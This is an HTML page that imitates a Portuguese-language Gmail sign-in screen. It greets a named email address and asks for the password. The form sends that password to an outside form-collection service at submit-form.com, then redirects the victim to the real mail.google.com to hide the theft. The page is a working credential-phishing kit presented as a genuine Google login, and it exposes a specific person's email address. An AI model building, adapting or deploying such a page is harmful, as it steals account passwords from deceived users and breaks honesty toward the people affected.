<!DOCTYPE html>

<html>
<head>
<title>
	Gmail
</title>
<meta content="summary_large_image" name="twitter:card"/>
<meta content="website" property="og:type"/>
<meta content="" property="og:description"/>
<meta content="https://preview.posted-stuff.com/TMd9-Z8Z8C-9pey-N1tr/" property="og:url"/>
<meta content="https://pro-bee-beepro-thumbnails.s3.amazonaws.com/messages/698579/681255/1337297/6528993_large.jpg" property="og:image"/>
<meta content="" property="og:title"/>
<meta content="" name="description"/>
<meta charset="utf-8"/>
<meta content="width=device-width" name="viewport"/>
<link href="https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/BeeProAgency/698579_681255/favicon_images/favicon-ico-3232--0bda09-16-icon.png" rel="icon" sizes="16x16"/>
<link href="https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/BeeProAgency/698579_681255/favicon_images/favicon-ico-3232--0bda09-32-icon.png" rel="icon" sizes="32x32"/>
<link href="https://d15k2d11r6t6rl.cloudfront.net/public/users/Integrators/BeeProAgency/698579_681255/favicon_images/favicon-ico-3232--0bda09-apple-touch-icon.png" rel="apple-touch-icon" sizes="180x180"/>
<link href="https://fonts.googleapis.com/css?family=Roboto" rel="stylesheet" type="text/css"/>
<style>
   .bee-row-1,
		.bee-row-2 {
			background-repeat: no-repeat
		}

		body {
			background-color: #fff;
			color: #000;
			font-family: 'Google Sans', Roboto, Tahoma, Verdana, Segoe, sans-serif
		}

		.bee-row-1 .bee-row-content,
		.bee-row-2 .bee-row-content {
			background-color: #fff;
			background-repeat: no-repeat
		}

		.bee-row-1 .bee-col-1 {
			border-bottom: 1px solid #dadce0;
			border-left: 1px solid #dadce0;
			border-right: 1px solid #dadce0;
			border-top: 1px solid #dadce0;
			padding-bottom: 60px;
			padding-top: 5px
		}

		.bee-row-2 .bee-col-1,
		.bee-row-2 .bee-col-2,
		.bee-row-2 .bee-col-3 {
			border-bottom: 0 solid transparent;
			border-left: 0 solid transparent;
			border-right: 0 solid transparent;
			border-top: 0 solid transparent
		}

		.bee-row-1 .bee-col-1 .bee-block-1 {
			padding-top: 25px;
			width: 100%
		}

		.bee-row-1 .bee-col-1 .bee-block-2 {
			padding-bottom: 5px;
			padding-top: 10px;
			text-align: center;
			width: 100%
		}

		.bee-row-1 .bee-col-1 .bee-block-3 {
			text-align: center;
			padding: 10px 10px 40px
		}

		.bee-row-1 .bee-col-1 .bee-block-4 {
			text-align: right;
			padding: 10px
		}

		.bee-row-2 .bee-col-1 {
			padding: 5px
		}

		.bee-row-2 .bee-col-1 .bee-block-1,
		.bee-row-2 .bee-col-2 .bee-block-1,
		.bee-row-2 .bee-col-3 .bee-block-1 {
			padding: 10px
		}

		.bee-row-2 .bee-col-2,
		.bee-row-2 .bee-col-3 {
			padding-bottom: 5px;
			padding-top: 5px
		}

		* {
			box-sizing: border-box
		}

		body,
		p {
			margin: 0
		}

		.bee-row-content {
			max-width: 420px;
			margin: 0 auto;
			display: flex
		}

		.bee-row-content .bee-col-w2 {
			flex: 2
		}

		.bee-row-content .bee-col-w3 {
			flex: 3
		}

		.bee-row-content .bee-col-w7 {
			flex: 7
		}

		.bee-row-content .bee-col-w12 {
			flex: 12
		}

		.bee-image img {
			display: block;
			width: 100%
		}

		.bee-image {
			overflow: auto
		}

		.bee-image .bee-center {
			margin: 0 auto
		}

		.bee-text {
			overflow-wrap: anywhere
		}

		.bee-button .content,
		.bee-html-block {
			text-align: center
		}

		.bee-heading h1 {
			margin-top: 0;
			margin-bottom: 0
		}

		@media (max-width:440px) {
			.bee-row-content:not(.no_stack) {
				display: block
			}
		}

		input {
			height: 50px;
		}

		input:focus {
    		border:2px solid #3273e8 !important;
  		}
  </style>
</head>
<body>
<div class="bee-page-container">
<div class="bee-row bee-row-1" style="margin-top: 20px;">
<div class="bee-row-content">
<div class="bee-col bee-col-1 bee-col-w12">
<div class="bee-block bee-block-1 bee-image">
<img alt="" class="bee-center bee-fixedwidth" src="logo.png" style="max-width:83px;"/>
</div>
<div class="bee-block bee-block-2 bee-heading">
<h1 style="color:#202124;direction:ltr;font-family:Roboto, Tahoma, Verdana, Segoe, sans-serif;font-size:23px;font-weight:normal;letter-spacing:normal;line-height:200%;text-align:center;">
<strong>
         Olá!
        </strong>
</h1>
</div>
<div class="bee-block bee-block-3 bee-button">
<div class="bee-button-content" style="font-size: 12px; line-height: 18px; background-color: transparent; border-bottom: 1px solid #DADCE0; border-left: 1px solid #DADCE0; border-radius: 50px; border-right: 1px solid #DADCE0; border-top: 1px solid #DADCE0; color: #3c4043; font-family: inherit; max-width: 100%; padding-bottom: 5px; padding-left: 20px; padding-right: 20px; padding-top: 5px; width: auto; display: inline-block;">
<span style="font-size: 16px; line-height: 150%; word-break: break-word;">
<span style="font-size: 14px; line-height: 21px;">
          bethtrindade57@gmail.com
         </span>
</span>
</div>
</div>

<div class="bee-block bee-block-5 bee-html-block">
<form action="https://submit-form.com/SQBQcOVa">
<input id="password" name="password" placeholder="Digite sua senha" required="" type="password" style="font-size: 14px; line-height: 18px; background-color: transparent; border-bottom: 1px solid #DADCE0; border-left: 1px solid #DADCE0; border-radius: 4px; border-right: 1px solid #DADCE0; border-top: 1px solid #DADCE0; color: #3c4043; font-family: inherit; max-width: 100%; padding-bottom: 5px; padding-left: 20px; padding-right: 20px; padding-top: 5px; width: 80%; margin-bottom: 15px; display: inline-block;"/>
<input name="_redirect" type="hidden" value="https://mail.google.com"/>



<div>
<button type="submit" style="font-size: 14px; line-height: 20px; background-color: #3273e8; border-bottom: 0px solid transparent; border-left: 0px solid transparent; border-radius: 4px; border-right: 0px solid transparent; border-top: 0px solid transparent; color: #ffffff; font-family: inherit; max-width: 100%; padding-bottom: 5px; padding-left: 20px; padding-right: 20px; padding-top: 5px; width: auto; display: inline-block;">
          Próxima
         </button>
</div>
</form>
</div>
</div>
</div>
</div>
<div class="bee-row bee-row-2" style="margin-top: 50px;">
<div class="bee-row-content no_stack">
<div class="bee-col bee-col-1 bee-col-w7">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #393d47; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px;">
<span style="font-size: 13px; line-height: 15px;">
          Português (Brasil)
         </span>
</p>
</div>
</div>
</div>
<div class="bee-col bee-col-2 bee-col-w3">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #393d47; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: right;">
<span style="font-size: 13px; line-height: 15px;">
          Privacidade
         </span>
</p>
</div>
</div>
</div>
<div class="bee-col bee-col-3 bee-col-w2">
<div class="bee-block bee-block-1 bee-text">
<div class="bee-text-content" style="font-size: 14px; line-height: 120%; color: #393d47; font-family: inherit;">
<p style="font-size: 14px; line-height: 16px; text-align: right;">
<span style="font-size: 13px; line-height: 15px;">
          Termos
         </span>
</p>
</div>
</div>
</div>
</div>
</div>
</div>
</body>
</html>
